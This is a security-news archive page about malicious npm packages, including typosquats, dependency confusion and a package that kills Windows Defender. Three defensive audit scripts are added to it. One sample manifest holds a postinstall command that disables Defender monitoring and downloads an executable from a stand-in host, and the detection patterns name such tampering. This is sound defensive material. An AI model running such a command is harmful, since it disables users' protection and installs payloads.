This Week in Malware, highlights include an influx of hundreds of dependency confusion packages with diverse targets and a ‘python-dateutils’ PyPI package that attempts to typosquat the widely used Python module, dateutil.
Tag: npm
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware: killing Windows Defender with an npm package
by Ax Sharma •
This Week in Malware, highlights include malicious npm package ‘flame-vali’ that claims to let developers “bypass any request proxys.” But that’s not quite the case. And, some more dependency confusion packages caught by us.
Europe, Global Security News, North America, Vulnerabilities
npm package disables Windows Defender before dropping trojan
by Ax Sharma •
Last week, Sonatype’s automated malware detection systems flagged npm package ‘flame-vali’ that claims to let developers “bypass any request proxys.” But that’s not quite the case.
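The flame-vali item above is a reminder that an npm package does not need a vulnerability to do damage: any dependency can run arbitrary commands through its install lifecycle scripts. The following audit is an added example (not code from the original post or from Sonatype) that walks the manifests of a dependency tree and flags install hooks containing commands that have no business there. The package manifests are constructed sample data, and the suspicious-command patterns are illustrative heuristics, not a description of what flame-vali actually ran.

```javascript
// Added example: audit install-time lifecycle scripts in a dependency tree.
// Manifests below are constructed sample data; the patterns are assumptions.

// Lifecycle hooks that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic rules: each names a behaviour that an install hook should never need.
const SUSPICIOUS = [
  { name: "powershell-invocation", re: /\bpowershell(\.exe)?\b/i },
  { name: "defender-tampering",    re: /Set-MpPreference|DisableRealtimeMonitoring|Add-MpPreference/i },
  { name: "remote-download",       re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/i },
  { name: "inline-eval",           re: /\bnode\s+-e\b|\beval\(/i },
  { name: "encoded-payload",       re: /base64|-EncodedCommand|-enc\b/i },
  { name: "persistence",           re: /\bschtasks\b|\bcrontab\b|reg\s+add/i },
];

// Returns one finding per (hook, rule) match in a single package manifest.
function auditManifest(name, manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const { name: rule, re } of SUSPICIOUS) {
      if (re.test(cmd)) findings.push({ package: name, hook, rule, command: cmd });
    }
  }
  return findings;
}

// Audits every manifest in a { name: manifest } map (e.g. built from node_modules).
function auditTree(manifests) {
  return Object.entries(manifests).flatMap(([name, m]) => auditManifest(name, m));
}

// Constructed sample tree: two benign packages and one that tampers with Defender.
const SAMPLE_TREE = {
  "left-pad-ish": { scripts: { test: "mocha" } },
  "native-addon": { scripts: { install: "node-gyp rebuild" } },   // legitimate native build
  "totally-legit": {
    scripts: {
      postinstall:
        'powershell -NoProfile -Command "Set-MpPreference -DisableRealtimeMonitoring $true; ' +
        'iwr http://example.invalid/x.exe -OutFile x.exe"',
    },
  },
};

const SAMPLE_FINDINGS = auditTree(SAMPLE_TREE);
console.log(JSON.stringify(SAMPLE_FINDINGS, null, 2));
```

In practice the map of manifests is built by reading every `package.json` under `node_modules`. Note that `node-gyp rebuild` in an `install` hook is normal for native add-ons and is not flagged; the point is to surface shell-level behaviour, not the mere presence of a hook. Installing with `npm install --ignore-scripts` and then running only the hooks you have reviewed is the blunt but effective complement to this check.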
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware—npm malware exfiltrates Windows SAM, Amazon EC2 credentials
by Ax Sharma •
This Week in Malware, we continue to see an uptick in outright malicious and dependency confusion packages employing novel tactics. A list of some of the packages caught by Sonatype’s automated malware detection systems is given below and more an…
Europe, Global Security News, North America, Vulnerabilities
This Week in Malware—Malicious Rust crate, ‘colors’ typosquats
by Ax Sharma •
This Week in Malware digest was delayed by a day in light of a significant announcement on Friday from Sonatype’s CTO Brian Fox. The announcement details Sonatype’s participation in an ongoing conversation led by the Open Source Security Foundati…
Europe, Global Security News, North America, Vulnerabilities
Malicious npm ‘colors’ typosquats pack Discord malware
by Ax Sharma •
Sonatype has caught newer typosquats of the popular ‘colors’ npm library that contain obfuscated malware. The malware in question comprises Discord info-stealers attempting to hijack the user’s Discord tokens and session information.
Malware Indicators (IoCs), Vulnerabilities
An npm Registry Bug Allowed Adding Random Maintainers To Malicious Packages
by Abeerah Hashim •
Researchers have discovered a severe vulnerability in the npm registry that could harm developers. Exploiting…
An npm Registry Bug Allowed Adding Random Maintainers To Malicious Packages on Latest Hacking News.
Europe, Global Security News, North America, Vulnerabilities
Fixing a vulnerability? Make sure your GitHub isn’t showing too much
by Ax Sharma •
obfuscated secrets and a $326M crypto hack: are your GitHub commits revealing too much?
When committing software projects to GitHub it remains crucial to ensure that secrets like your private tokens, API keys, and passwords are not accidentally c…
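The advice above (keep tokens, API keys and passwords out of commits) is easiest to follow when it is enforced mechanically before a push. The following scanner is an added example, not code from the original post: it walks the added lines of a unified diff and flags known token formats plus high-entropy values assigned to secret-looking keys. The diff is constructed sample input. The prefixes used (AKIA for AWS access key IDs, ghp_ for GitHub personal access tokens, npm_ for npm tokens) are the documented formats, but treat the exact regexes and the entropy threshold as assumptions to tune for your own providers.

```javascript
// Added example: scan the added lines of a git diff for committed secrets.
// Sample diff is constructed; token regexes and threshold are assumptions.

const PATTERNS = [
  { name: "aws-access-key-id", re: /\bAKIA[0-9A-Z]{16}\b/ },
  { name: "github-pat",        re: /\bghp_[A-Za-z0-9]{36}\b/ },
  { name: "npm-token",         re: /\bnpm_[A-Za-z0-9]{36}\b/ },
  { name: "private-key-block", re: /-----BEGIN [A-Z ]*PRIVATE KEY-----/ },
];

// Shannon entropy in bits per character; random-looking tokens score high.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Generic catch-all: a quoted literal of 16+ chars assigned to a secret-looking key.
const ASSIGNMENT = /(secret|token|password|api[_-]?key)\w*\s*[:=]\s*["']([^"']{16,})["']/i;

function scanLine(line) {
  const hits = [];
  for (const { name, re } of PATTERNS) if (re.test(line)) hits.push(name);
  const m = ASSIGNMENT.exec(line);
  if (m && shannonEntropy(m[2]) > 3.5) hits.push("high-entropy-assignment");
  return hits;
}

// Only '+' lines (not the '+++' file header) can introduce a secret; removed
// lines are ignored and the new-file line number is tracked from hunk headers.
function scanDiff(diff) {
  const findings = [];
  let file = null;
  let newLine = 0;
  for (const raw of diff.split("\n")) {
    if (raw.startsWith("+++ ")) { file = raw.slice(4).replace(/^b\//, ""); continue; }
    const hunk = /^@@ -\d+(?:,\d+)? \+(\d+)/.exec(raw);
    if (hunk) { newLine = Number(hunk[1]); continue; }
    if (raw.startsWith("-")) continue;                 // removed line or '---' header
    if (raw.startsWith("+")) {
      const hits = scanLine(raw.slice(1));
      if (hits.length) findings.push({ file, line: newLine, rules: hits });
    }
    if (!raw.startsWith("\\")) newLine++;             // context and added lines advance the counter
  }
  return findings;
}

// Constructed sample diff: one hard-coded AWS key, one token correctly read from
// the environment (should not fire), and one high-entropy password literal.
const SAMPLE_DIFF = [
  "diff --git a/config/deploy.js b/config/deploy.js",
  "--- a/config/deploy.js",
  "+++ b/config/deploy.js",
  "@@ -1,3 +1,6 @@",
  ' const region = "us-east-1";',
  '+const awsAccessKeyId = "AKIAIOSFODNN7EXAMPLE";',
  '+const npmToken = "npm_" + process.env.NPM_TOKEN; // read from env, fine',
  '+const dbPassword = "zG7q!pL2#vR9wX4m@Kd8";',
  " module.exports = { region };",
].join("\n");

console.log(JSON.stringify(scanDiff(SAMPLE_DIFF), null, 2));
```

Wire `scanDiff` into a pre-commit hook over `git diff --cached` and fail the commit on any finding. The entropy rule is what catches secrets with no recognisable prefix; the cost is the occasional false positive on random-looking but harmless literals, which is the right trade-off for a hook that runs before anything leaves the machine.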
Europe, Global Security News, North America, Vulnerabilities
This week in malware—a ‘fix-crash’ info-stealer and 500+ malicious npm packages
by Ax Sharma •
This week in malware, Sonatype’s automated malware detection systems caught upwards of 300 npm packages, including 86 named after popular NodeJS functions.
Europe, Global Security News, North America, Vulnerabilities
86 Malicious npm Packages Named After Popular NodeJS Functions
by Ax Sharma •
Sonatype’s automated malware detection bots have caught 86 npm packages that are named after popular NodeJS and JavaScript functions.
The post 86 Malicious npm Packages Named After Popular NodeJS Functions appeared first on Security Boulevard.
Malware Indicators (IoCs), Vulnerabilities
Critical Remote Code Execution Vulnerability Found In Parse Server
by Abeerah Hashim •
Researchers have discovered a critical-severity bug in the open-source tool Parse Server. Exploiting this server…
Critical Remote Code Execution Vulnerability Found In Parse Server on Latest Hacking News.
Europe, Global Security News, North America, Vulnerabilities
Remember npm library ‘colors’? There’s no such thing as ‘colors-2.0’
by Ax Sharma •
The popular npm package ‘colors’ made headlines earlier this year when its developer, Marak Squires, sabotaged the component by adding an infinite loop that printed zalgo text incessantly for everyone using the dependency.
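Two naming attacks recur through the items above: dependency confusion (a public package published under the name of an internal one, as in the This Week in Malware digests) and typosquats or look-alikes of popular packages (the 86 packages named after NodeJS functions, the ‘colors’ squats, and ‘colors-2.0’). The following lockfile audit is an added example, not code from the original posts or from Sonatype, that catches both from a package-lock alone. The lockfile, the internal registry URL, the list of internal names and the list of popular packages are constructed sample data; the edit-distance threshold of one is an assumption.

```javascript
// Added example: audit a package-lock (v2/v3 "packages" map) for
// dependency confusion and typosquats. All inputs are constructed samples.

const INTERNAL_REGISTRY = "https://npm.corp.example/";          // assumed internal registry
const INTERNAL_NAMES = new Set(["acme-logger", "@acme/auth"]);   // names that must never come from npmjs
const POPULAR = ["colors", "lodash", "express", "chalk", "faker"]; // sample of well-known packages

// Damerau-Levenshtein (optimal string alignment) distance: one typo or
// transposition costs 1, which is what most typosquats amount to.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Flags names one typo away from a popular package, or a popular name with a
// bolted-on version/suffix ('colors-2.0', 'lodash-js'). The genuine package
// itself is never flagged.
function classifyName(name) {
  const reasons = [];
  if (POPULAR.includes(name)) return reasons;
  for (const p of POPULAR) {
    if (editDistance(name, p) === 1) reasons.push(`typosquat-of:${p}`);
    else if (new RegExp(`^${p}[-_.](?:\\d|js$|node$)`).test(name)) reasons.push(`suffix-squat-of:${p}`);
  }
  return reasons;
}

function auditLock(lock) {
  const findings = [];
  for (const [key, entry] of Object.entries(lock.packages)) {
    if (key === "") continue;                               // the root project entry
    const name = key.replace(/^.*node_modules\//, "");      // "node_modules/@acme/auth" -> "@acme/auth"
    const resolved = entry.resolved || "";
    // Dependency confusion: an internal name that resolved to anything but our registry.
    if (INTERNAL_NAMES.has(name) && !resolved.startsWith(INTERNAL_REGISTRY)) {
      findings.push({ name, rule: "dependency-confusion", resolved });
    }
    for (const rule of classifyName(name)) findings.push({ name, rule, resolved });
  }
  return findings;
}

// Constructed sample lockfile: the real 'colors', a 'colors-2.0' look-alike,
// a transposed 'lodahs', a correctly sourced internal package, and an internal
// name served from the public registry.
const SAMPLE_LOCK = {
  name: "acme-app",
  lockfileVersion: 3,
  packages: {
    "": { dependencies: {} },
    "node_modules/colors":      { version: "1.4.0",   resolved: "https://registry.npmjs.org/colors/-/colors-1.4.0.tgz" },
    "node_modules/colors-2.0":  { version: "2.0.1",   resolved: "https://registry.npmjs.org/colors-2.0/-/colors-2.0-2.0.1.tgz" },
    "node_modules/lodahs":      { version: "4.17.21", resolved: "https://registry.npmjs.org/lodahs/-/lodahs-4.17.21.tgz" },
    "node_modules/@acme/auth":  { version: "3.1.0",   resolved: "https://npm.corp.example/@acme/auth/-/auth-3.1.0.tgz" },
    "node_modules/acme-logger": { version: "99.0.0",  resolved: "https://registry.npmjs.org/acme-logger/-/acme-logger-99.0.0.tgz" },
  },
};

console.log(JSON.stringify(auditLock(SAMPLE_LOCK), null, 2));
```

The dependency-confusion rule is the important one for a CI gate: the lockfile records where each tarball came from, so a single line tells you whether an internal name was quietly satisfied by the public registry (the implausibly high version on acme-logger in the sample is the classic tell). Pinning internal packages to a scope and mapping that scope to your registry in `.npmrc` (`@acme:registry=...`) removes the ambiguity at the source; this audit is the check that the mapping held.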
Europe, Global Security News, North America, Vulnerabilities
Cyberattacks Related to JavaScript NPM Rise Sharply
by Nathan Eddy •
There has been a sharp rise in malicious activity found in npm, the most popular JavaScript package manager used by developers worldwide, with more than 1,300 malicious npm packages discovered for use in supply chain attacks, cryptojacking, data theft…
Europe, Global Security News, North America, Vulnerabilities
New Year, New CVE: a Deep Dive into the ‘node-forge’ (CVE-2022-0122)
by Juan Aguirre •
With over 16 Million weekly downloads, the important and widely-used “node-forge” component on npm implements key security functions, including Transport Layer Security protocol, cryptographic functions, and development tools for web apps in nati…
Europe, Global Security News, North America
‘Faker’ npm Library Gets New Home After Dev Throws in the Towel
by Ax Sharma •
The post ‘Faker’ npm Library Gets New Home After Dev Throws in the Towel appeared first on Security Boulevard.
Security Vendor News
S3 Ep65: Supply chain conniption, NetUSB hole, Honda flashback, FTC muscle [Podcast + Transcript]
by Paul Ducklin •
Latest episode - listen to it or read it now!
Security Vendor News
JavaScript developer destroys own projects in supply chain “lesson”
by Paul Ducklin •
Two popular open source JavaScript packages recently got “hacked” in a symbolic gesture by the original project creator.
Europe, Global Security News, North America
Evolving Threat series — Infiltrating NPM’s Supply Chain (UA-Parser-js)
by Chetan Conikee •
And if you think you are safe (because you recently procured a well-marketed commercial open source dependency scanner), that is when you are most in danger, as all such tools lack intellige…
Security Vendor News
Poisoned proxy PACs! The NPM package with a network-wide security hole…
by Paul Ducklin •
3,000,000 downloads a week… if only they’d read the fastidious manual!